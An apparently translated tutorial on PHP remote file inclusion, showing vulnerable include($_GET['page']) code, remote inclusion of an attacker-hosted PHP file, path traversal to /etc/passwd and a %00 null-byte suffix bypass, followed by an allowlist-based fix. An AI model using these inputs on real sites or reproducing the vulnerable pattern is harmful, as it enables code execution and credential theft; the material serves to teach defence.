What causes the PHP remote file inclusion vulnerability
Junior PHP programmers often do not yet have a full grasp of PHP security. The first step is to understand the principles behind program vulnerabilities. This article introduces the causes of the PHP remote file inclusion vulnerability.
The first question is: what is a "remote file inclusion vulnerability"? The short answer is that the server executes a malicious file because the PHP program filters arbitrary file inclusions too loosely. This is a filtering problem on the programmer's side. Keep in mind that this kind of bug can appear in any CGI program.
1. Finding the PHP remote file inclusion bug:
To find the bug, we first need to know what the word "include" means. Most languages have some way to include arbitrary files. In PHP, we use the include() function, and it works like this:
To include include1.PHP in Main.PHP, I would write include("include1.PHP"). It is not very scientific, but you need to know why.
Look at this first. When user input is passed in, the file it names is included:
<ol class="dp-c">
<li class="alt"><span class="keyword">if</span> (<span class="vars">$_GET</span>['page']) {</li>
<li><span class="keyword">include</span> <span class="vars">$_GET</span>['page']; // vulnerable: user input is used directly as the include target</li>
<li class="alt">} <span class="keyword">else</span> {</li>
<li><span class="keyword">include</span> <span class="string">"home.PHP"</span>;</li>
<li class="alt">}</li>
</ol>
This structure is common in dynamic websites. The problem is that it allows pages to be viewed through URLs such as hxxp://www.target.com/explame.PHP?page=main.PHP or hxxp://www.target.com/explame.PHP?page=downloads.PHP. If your program has a bug like this, that is very unfortunate, and you have only yourself to blame. It is only a filtering problem, but it is exactly this filtering lapse that gives script hackers their opening. In zone-h.org's survey, file inclusion attacks account for 9.4%, which is more than enough to deserve our attention. Nor is the problem new: it existed years ago, yet batch after batch of programmers still go down the same old path. That is why this article exists. Writing an article like this in 2004 is already a cliché, but I still have to write it; after all, it is not mere complaining if people gain something from it.
2. Test
Here is an example of remote file inclusion. Its only purpose is to help you keep your own program safe. Let's look at the details:
<ol class="dp-xml">
<li class="alt"><span>hxxp://www.target.com/explame.PHP?<span class="attribute">page</span>=<span class="attribute-value">zizzy</span></span></li>
<li><span>Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.PHP on line 3</span></li>
<li class="alt"><span>Warning: main(): Failed opening 'zizzy' for inclusion (<span class="attribute">include_path</span>=<span class="attribute-value">'.:/usr/local/lib/PHP'</span>) in /var/www/htdocs/index.PHP on line 3</span></li>
</ol>
These error messages from PHP tell us that the program tried to include the file /var/www/htdocs/zizzy but could not find it: note the "No such file or directory". Now you understand the PHP remote file inclusion vulnerability.
3. Using it
PHP really is convenient here: it can load files remotely. So I create a yeah.txt and put it on my site at hxxp://www.mysite.com/yeah.txt. Its content is:
<ol class="dp-c"><li class="alt"><span><?php echo "Wow,test!"; ?></span></li></ol>
Then
<ol class="dp-xml"><li class="alt"><span>hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt</span></li></ol>
This echoes Wow, test!, so the file was executed. Reading config.PHP, which contains the MySQL password, is not difficult either. Write a system() call into yeah.txt and try it; what do you think happens? Going further, submit page=../../../../../../../etc/passwd. Now you know what inclusion really means.
4. Another variant of the PHP remote file inclusion vulnerability
Sometimes programmers write it differently, like this, to limit the scope of what can be included:
<ol class="dp-c">
<li class="alt"><span class="keyword">if</span> (<span class="vars">$_GET</span>['page']) {</li>
<li><span class="keyword">include</span> <span class="string">"$_GET[page].PHP"</span>; // vulnerable: a fixed suffix is appended, but the input is still unchecked</li>
<li class="alt">} <span class="keyword">else</span> {</li>
<li><span class="keyword">include</span> <span class="string">"home.PHP"</span>;</li>
<li class="alt">}</li>
</ol>
We submit
<ol class="dp-xml">
<li class="alt"><span>hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt</span></li>
<li><span>Warning: main(hxxp://www.mysite.com/yeah.txt.PHP): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3</span></li>
<li class="alt"><span>Warning: main(): Failed opening 'hxxp://www.mysite.com/yeah.txt.PHP' for inclusion (<span class="attribute">include_path</span>=<span class="attribute-value">'.:/usr/local/lib/PHP'</span>) in /var/www/htdocs/explame.PHP on line 3</span></li>
</ol>
The include failed because the suffix is now forced to .PHP. Rename yeah.txt on mysite.com to yeah.PHP and it executes as before. But what about passwd?
<ol class="dp-xml">
<li class="alt"><span>Warning: main(../../../../../../../etc/passwd.PHP): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3</span></li>
<li><span>Warning: main(): Failed opening '../../../../../../../etc/passwd.PHP' for inclusion (<span class="attribute">include_path</span>=<span class="attribute-value">'.:/usr/local/lib/PHP'</span>) in /var/www/htdocs/explame.PHP on line 3</span></li>
</ol>
Here a NUL character, %00, is used to get past the check:
<ol class="dp-xml"><li class="alt"><span>hxxp://www.target.com/explame.PHP?pa.../etc/passwd%00</span></li></ol>
And there it is.
When including files, it is best to specify exactly which file to include, or to filter the submitted variables. That is the point of this article on the PHP remote file inclusion vulnerability. It is written not for hackers but for programmers who are new to the subject. There are many articles like this on the Internet; as long as someone benefits, it has served its purpose.
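The closing advice above (name the files that may be included, or filter the submitted variable), applied to the flawed snippets in sections 1 and 4, as an added example that is not code from the original article. The request value is used only as a key into a fixed list, so the URL, traversal and %00 inputs shown earlier never reach include. The page keys, file names and the pages/ directory are assumptions.

```php
<?php
// Added example: allowlist-based include. Page keys, file names and the
// pages/ directory are assumptions, not taken from the original article.
const PAGES = [
    'home'      => 'home.php',
    'main'      => 'main.php',
    'downloads' => 'downloads.php',
];

// Map a user-supplied key to a file inside $baseDir; null means "reject".
function resolve_page($requested, string $baseDir): ?string
{
    // The request value is only ever used as a lookup key, never as a path.
    // Non-strings (e.g. ?page[]=x) and unknown keys are rejected.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // Defence in depth: the file must exist and resolve inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

$baseDir = __DIR__ . DIRECTORY_SEPARATOR . 'pages';

if (PHP_SAPI === 'cli') {
    // Constructed inputs mirroring the requests discussed in the article.
    // 'main' resolves only if pages/main.php exists; the rest are never keys.
    $samples = ['main', 'zizzy', 'http://attacker.example/yeah.txt',
                '../../../../../../../etc/passwd', "../etc/passwd\0"];
    foreach ($samples as $s) {
        $r = resolve_page($s, $baseDir);
        printf("%-40s => %s\n", addcslashes($s, "\0"), $r ?? 'rejected');
    }
    exit(0);
}

// Web request: fall back to the home page when no key is supplied.
$file = resolve_page($_GET['page'] ?? 'home', $baseDir);
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

As a second layer, keep allow_url_include set to Off in php.ini (the default since PHP 5.2.0) so include cannot fetch URLs at all. PHP 5.3.4 and later also reject paths that contain a NUL byte.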